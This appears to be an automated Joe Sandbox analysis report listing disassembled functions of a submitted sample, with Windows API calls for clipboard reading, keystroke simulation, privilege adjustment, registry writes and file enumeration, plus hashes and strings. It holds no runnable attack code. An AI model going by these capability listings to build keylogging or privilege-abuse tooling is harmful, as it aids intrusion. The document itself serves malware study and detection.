Instruction ID: 9aef84ee6088187db43c86a62f22e7c0db4218694dfc6b35c37266d4273bd1b0
Opcode Fuzzy Hash: e333a1ea0bae96ba64603e5e0a7563877942f91c1d1cdc1937c3ca309299fe3e
Instruction Fuzzy Hash: 2AD0C77465420CBFE710DB80DC46FA9777CD745711F100195FD0456690D6B27E509795

Uniqueness

Uniqueness Score: -1.00%

Function 0098548B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 00985496

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: 5d0b06931bfef858d2265f709b77bf09b9d7e35e92f8646cf6264116e2238ac6
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: 93B0927684020C77DF023E92EC02F593B199B80678F808020FB0C18272A673A6A49689

Uniqueness

Uniqueness Score: -1.00%

Function 009CD2E6 Relevance: 1.4, APIs: 1, Instructions: 198COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000002,00000000), ref: 009CD46A

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: af401596b4d5c2a935bb0f772f145deabad81eee49b77549b6701d5e2465f7e8
Instruction ID: bc966f207e8eb192aa639e6ec06c83b0a18c53b453cd5aa05bc368a90da1babb
Opcode Fuzzy Hash: af401596b4d5c2a935bb0f772f145deabad81eee49b77549b6701d5e2465f7e8
Instruction Fuzzy Hash: A6717E306093428FC714EF68C591F6AB7E4AFC8314F04496DF9969B2A2DB30ED49CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00980E48 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 00980EF7

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 7c045d51a4c954c0e1d775c6e49ac84844d4789facfb933e8422152e86d51b95
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: A231C571A00105DFC7A8EF58D48096AF7AAFF99300B648AA5E40ACB752D731EDC5CBC0

Uniqueness

Uniqueness Score: -1.00%

Function 03E92300 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 03E92311

Memory Dump Source

Source File: 00000000.00000002.2134404358.0000000003E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3e90000_SecuriteInfo.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 36732279830f38e8ca7479aabcd321c78ff1c0051f0098eddb8bdb9ef6970bf4
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: 35E0E67494010EEFDF00EFB8D54969E7FB4EF04301F1006A1FD01D2280D6309D508A62

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 009ECDAC Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 637windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00962612: GetWindowLongW.USER32(?,000000EB), ref: 00962623

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 009ECE50
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 009ECE91
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 009ECED6
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 009ECF00
SendMessageW.USER32 ref: 009ECF29
_wcsncpy.LIBCMT ref: 009ECFA1
GetKeyState.USER32(00000011), ref: 009ECFC2
GetKeyState.USER32(00000009), ref: 009ECFCF
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 009ECFE5
GetKeyState.USER32(00000010), ref: 009ECFEF
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 009ED018
SendMessageW.USER32 ref: 009ED03F
SendMessageW.USER32(?,00001030,?,009EB602), ref: 009ED145
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 009ED15B
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 009ED16E
SetCapture.USER32(?), ref: 009ED177
ClientToScreen.USER32(?,?), ref: 009ED1DC
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 009ED1E9
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 009ED203
ReleaseCapture.USER32 ref: 009ED20E
GetCursorPos.USER32(?), ref: 009ED248
ScreenToClient.USER32(?,?), ref: 009ED255
SendMessageW.USER32(?,00001012,00000000,?), ref: 009ED2B1
SendMessageW.USER32 ref: 009ED2DF
SendMessageW.USER32(?,00001111,00000000,?), ref: 009ED31C
SendMessageW.USER32 ref: 009ED34B
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 009ED36C
SendMessageW.USER32(?,0000110B,00000009,?), ref: 009ED37B
GetCursorPos.USER32(?), ref: 009ED39B
ScreenToClient.USER32(?,?), ref: 009ED3A8
GetParent.USER32(?), ref: 009ED3C8
SendMessageW.USER32(?,00001012,00000000,?), ref: 009ED431
SendMessageW.USER32 ref: 009ED462
ClientToScreen.USER32(?,?), ref: 009ED4C0
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 009ED4F0
SendMessageW.USER32(?,00001111,00000000,?), ref: 009ED51A
SendMessageW.USER32 ref: 009ED53D
ClientToScreen.USER32(?,?), ref: 009ED58F
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 009ED5C3

Part of subcall function 009625DB: GetWindowLongW.USER32(?,000000EB), ref: 009625EC

GetWindowLongW.USER32(?,000000F0), ref: 009ED65F

Strings

F, xrefs: 009ED543
@GUI_DRAGID, xrefs: 009ED1AA

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F
API String ID: 3977979337-4164748364
Opcode ID: 3fd760051f7097782cdd7e5890fef3e0b6efb82f2d13eec9ecc1eb2316919511
Instruction ID: 2d9db750557b644cb9ac51f588ef0806c8b652cf20c99d120494913f941d33ba
Opcode Fuzzy Hash: 3fd760051f7097782cdd7e5890fef3e0b6efb82f2d13eec9ecc1eb2316919511
Instruction Fuzzy Hash: E642A070105281AFD726CF29C894FAABBE9FF48714F14092DF699872A0C731DD52DB92

Uniqueness

Uniqueness Score: -1.00%

Function 009E804A Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 571windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000400,00000000,00000000), ref: 009E873F

Strings

%d/%02d/%02d, xrefs: 009E8478

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend
String ID: %d/%02d/%02d
API String ID: 3850602802-328681919
Opcode ID: f9e9e532c156185f484bef8934ed8ce3ad192c1c94a1f76750d86a0142717afb
Instruction ID: 698aea95d446e9b8e285e5f47c80a8ba0496e9420446123147b317dabb2309fa
Opcode Fuzzy Hash: f9e9e532c156185f484bef8934ed8ce3ad192c1c94a1f76750d86a0142717afb
Instruction Fuzzy Hash: D7120671500288ABEB269FA5CC89FAF7BB8EF85710F204529F519DA2E1DF748D41CB10

Uniqueness

Uniqueness Score: -1.00%

Function 0097710E Relevance: 48.8, APIs: 19, Strings: 6, Instructions: 5093COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 009775C2
_memset.LIBCMT ref: 009776B1
_memmove.LIBCMT ref: 00977C4B
_memmove.LIBCMT ref: 00977E4F

Strings

Q\E, xrefs: 009781C1
\b(?=\w), xrefs: 009B3C34
[:<:]], xrefs: 009775F1
[:>:]], xrefs: 0097760A
DEFINE, xrefs: 009B25AF
\b(?<=\w), xrefs: 009B3C41

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: _memmove$_memset
String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
API String ID: 1357608183-1798697756
Opcode ID: 0fe5760922064a5af876895e661eb4bd02e5cc2895568ba99cd7a4a34f1e49a6
Instruction ID: 32810451bd3dda1df94f8f4b456bf8c47c1de841ae4233f315a7a5de6a0115d8
Opcode Fuzzy Hash: 0fe5760922064a5af876895e661eb4bd02e5cc2895568ba99cd7a4a34f1e49a6
Instruction Fuzzy Hash: 2E93B271A04219DFDB24CF98C9817EDB7B5FF48720F24856AE949EB281E7749E81CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00964A35 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,?), ref: 00964A3D
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0099DA8E
IsIconic.USER32(?), ref: 0099DA97
ShowWindow.USER32(?,00000009), ref: 0099DAA4
SetForegroundWindow.USER32(?), ref: 0099DAAE
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0099DAC4
GetCurrentThreadId.KERNEL32 ref: 0099DACB
GetWindowThreadProcessId.USER32(?,00000000), ref: 0099DAD7
AttachThreadInput.USER32(?,00000000,00000001), ref: 0099DAE8
AttachThreadInput.USER32(?,00000000,00000001), ref: 0099DAF0
AttachThreadInput.USER32(00000000,?,00000001), ref: 0099DAF8
SetForegroundWindow.USER32(?), ref: 0099DAFB
MapVirtualKeyW.USER32(00000012,00000000), ref: 0099DB10
keybd_event.USER32(00000012,00000000), ref: 0099DB1B
MapVirtualKeyW.USER32(00000012,00000000), ref: 0099DB25
keybd_event.USER32(00000012,00000000), ref: 0099DB2A
MapVirtualKeyW.USER32(00000012,00000000), ref: 0099DB33
keybd_event.USER32(00000012,00000000), ref: 0099DB38
MapVirtualKeyW.USER32(00000012,00000000), ref: 0099DB42
keybd_event.USER32(00000012,00000000), ref: 0099DB47
SetForegroundWindow.USER32(?), ref: 0099DB4A
AttachThreadInput.USER32(?,?,00000000), ref: 0099DB71

Strings

Shell_TrayWnd, xrefs: 0099DA89

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 2f9dc191e384f6b0638b0e7255e86373ddfc6461f9b6854d4c83374bd7904e9b
Instruction ID: d041e8d4caa1ad52315a41a236baf2abd57ad638bbedced7a69a5ee06ea9fd94
Opcode Fuzzy Hash: 2f9dc191e384f6b0638b0e7255e86373ddfc6461f9b6854d4c83374bd7904e9b
Instruction Fuzzy Hash: 2D319371A55358BBEF206FA59C89F7F3E6CEB44B50F114026FA04EA1D0CAB15D00BAA0

Uniqueness

Uniqueness Score: -1.00%

Function 009B8858 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 009B8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 009B8D0D
Part of subcall function 009B8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 009B8D3A
Part of subcall function 009B8CC3: GetLastError.KERNEL32 ref: 009B8D47

_memset.LIBCMT ref: 009B889B
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 009B88ED
CloseHandle.KERNEL32(?), ref: 009B88FE
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 009B8915
GetProcessWindowStation.USER32 ref: 009B892E
SetProcessWindowStation.USER32(00000000), ref: 009B8938
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 009B8952

Part of subcall function 009B8713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,009B8851), ref: 009B8728
Part of subcall function 009B8713: CloseHandle.KERNEL32(?,?,009B8851), ref: 009B873A

Strings

default, xrefs: 009B894D
winsta0, xrefs: 009B8910
, xrefs: 009B88AA

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: f40ae690d9c01d9119505f6f9c7bcae557b578d981e112d4e2537127dd4fa351
Instruction ID: bc2fb808f975b987296ff024649fc477d0225ab07c69601d02ae42173499335f
Opcode Fuzzy Hash: f40ae690d9c01d9119505f6f9c7bcae557b578d981e112d4e2537127dd4fa351
Instruction Fuzzy Hash: E2816C71910249AFDF11DFA4DE85AEFBBBCEF08724F18412AF910A6161DB318E15DB60

Uniqueness

Uniqueness Score: -1.00%

Function 009D425A Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(009EF910), ref: 009D4284
IsClipboardFormatAvailable.USER32(0000000D), ref: 009D4292
GetClipboardData.USER32(0000000D), ref: 009D429A
CloseClipboard.USER32 ref: 009D42A6
GlobalLock.KERNEL32(00000000), ref: 009D42C2
CloseClipboard.USER32 ref: 009D42CC
GlobalUnlock.KERNEL32(00000000,00000000), ref: 009D42E1
IsClipboardFormatAvailable.USER32(00000001), ref: 009D42EE
GetClipboardData.USER32(00000001), ref: 009D42F6
GlobalLock.KERNEL32(00000000), ref: 009D4303
GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 009D4337
CloseClipboard.USER32 ref: 009D4447

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
String ID:
API String ID: 3222323430-0
Opcode ID: bc86ce43393e2bb2bb818ebba9df7b6a9cd3285a1ac9b7128afdb48f9becdba3
Instruction ID: 98bfdeded87d161b367d6c6588b68f126a0baa78b31012cd4273259e5ff5e083
Opcode Fuzzy Hash: bc86ce43393e2bb2bb818ebba9df7b6a9cd3285a1ac9b7128afdb48f9becdba3
Instruction Fuzzy Hash: 9751A031248346ABD701FF64DC96F6E77ACAF84B00F00852AF696D72A1DB70DD049B62

Uniqueness

Uniqueness Score: -1.00%

Function 009CC9C7 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 009CC9F8
FindClose.KERNEL32(00000000), ref: 009CCA4C
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 009CCA71
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 009CCA88
FileTimeToSystemTime.KERNEL32(?,?), ref: 009CCAAF
__swprintf.LIBCMT ref: 009CCAFB
__swprintf.LIBCMT ref: 009CCB3E

Part of subcall function 00967F41: _memmove.LIBCMT ref: 00967F82

__swprintf.LIBCMT ref: 009CCB92

Part of subcall function 009838D8: __woutput_l.LIBCMT ref: 00983931

__swprintf.LIBCMT ref: 009CCBE0

Part of subcall function 009838D8: __flsbuf.LIBCMT ref: 00983953
Part of subcall function 009838D8: __flsbuf.LIBCMT ref: 0098396B

__swprintf.LIBCMT ref: 009CCC2F
__swprintf.LIBCMT ref: 009CCC7E
__swprintf.LIBCMT ref: 009CCCCD

Strings

%4d, xrefs: 009CCB38
%4d%02d%02d%02d%02d%02d, xrefs: 009CCAF5
%02d, xrefs: 009CCB86, 009CCB90, 009CCBDE, 009CCC2D, 009CCC7C, 009CCCCB

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 3953360268-2428617273
Opcode ID: 71a1ae24247532675e4f2a9fe1b7c29daf0998347b7d10c5d6fd178f33118723
Instruction ID: 08fb54f849314f8a57368eab739581bec608f5a5c5940d0b2d5ffbef51544195
Opcode Fuzzy Hash: 71a1ae24247532675e4f2a9fe1b7c29daf0998347b7d10c5d6fd178f33118723
Instruction Fuzzy Hash: CBA10DB1508344ABC710EBA4C995EAFB7ECEFD4704F44491EF596C7191EA34DA08CB62

Uniqueness

Uniqueness Score: -1.00%

Function 009CF200 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 009CF221
_wcscmp.LIBCMT ref: 009CF236
_wcscmp.LIBCMT ref: 009CF24D
GetFileAttributesW.KERNEL32(?), ref: 009CF25F
SetFileAttributesW.KERNEL32(?,?), ref: 009CF279
FindNextFileW.KERNEL32(00000000,?), ref: 009CF291
FindClose.KERNEL32(00000000), ref: 009CF29C
FindFirstFileW.KERNEL32(*.*,?), ref: 009CF2B8
_wcscmp.LIBCMT ref: 009CF2DF
_wcscmp.LIBCMT ref: 009CF2F6
SetCurrentDirectoryW.KERNEL32(?), ref: 009CF308
SetCurrentDirectoryW.KERNEL32(00A1A5A0), ref: 009CF326
FindNextFileW.KERNEL32(00000000,00000010), ref: 009CF330
FindClose.KERNEL32(00000000), ref: 009CF33D
FindClose.KERNEL32(00000000), ref: 009CF34F

Strings

*.*, xrefs: 009CF2B3

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: 2dcf5586318d57efe98d60cb5bb917a70b10f3ce9c1541d7c81efb049dfca7b3
Instruction ID: d7018163c9e4e80c95fd6e48617ff34006eceb21cd6fc4188475e018821e2a03
Opcode Fuzzy Hash: 2dcf5586318d57efe98d60cb5bb917a70b10f3ce9c1541d7c81efb049dfca7b3
Instruction Fuzzy Hash: 0B3103369042497ACF10DBB0DCA8FDE77ADAF483A0F14417AE910D3190EB30DE45DA25

Uniqueness

Uniqueness Score: -1.00%

Function 009E0AE2 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009E0BDE
RegCreateKeyExW.ADVAPI32(?,?,00000000,009EF910,00000000,?,00000000,?,?), ref: 009E0C4C
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 009E0C94
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 009E0D1D
RegCloseKey.ADVAPI32(?), ref: 009E103D
RegCloseKey.ADVAPI32(00000000), ref: 009E104A

Strings

REG_MULTI_SZ, xrefs: 009E0E05
REG_EXPAND_SZ, xrefs: 009E0CBA
REG_DWORD, xrefs: 009E0F0E
REG_SZ, xrefs: 009E0D5B
REG_BINARY, xrefs: 009E0FD8
REG_QWORD, xrefs: 009E0F8B

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: b9ec09359ad4967782b57abddba392185aa92e23debb63b6135711d652f9eb15
Instruction ID: 4549174d07714aedf6c8ef2e806fb0649de9a33772a62af3f642cd73eacceab2
Opcode Fuzzy Hash: b9ec09359ad4967782b57abddba392185aa92e23debb63b6135711d652f9eb15
Instruction Fuzzy Hash: AC026B752046419FCB15EF19C895E2AB7E9FF89724F04885DF88A9B362CB74ED40CB81

Uniqueness

Uniqueness Score: -1.00%

Function 009CF35D Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 009CF37E
_wcscmp.LIBCMT ref: 009CF393
_wcscmp.LIBCMT ref: 009CF3AA

Part of subcall function 009C45C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 009C45DC

FindNextFileW.KERNEL32(00000000,?), ref: 009CF3D9
FindClose.KERNEL32(00000000), ref: 009CF3E4
FindFirstFileW.KERNEL32(*.*,?), ref: 009CF400
_wcscmp.LIBCMT ref: 009CF427
_wcscmp.LIBCMT ref: 009CF43E
SetCurrentDirectoryW.KERNEL32(?), ref: 009CF450
SetCurrentDirectoryW.KERNEL32(00A1A5A0), ref: 009CF46E
FindNextFileW.KERNEL32(00000000,00000010), ref: 009CF478
FindClose.KERNEL32(00000000), ref: 009CF485
FindClose.KERNEL32(00000000), ref: 009CF497

Strings

*.*, xrefs: 009CF3FB

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
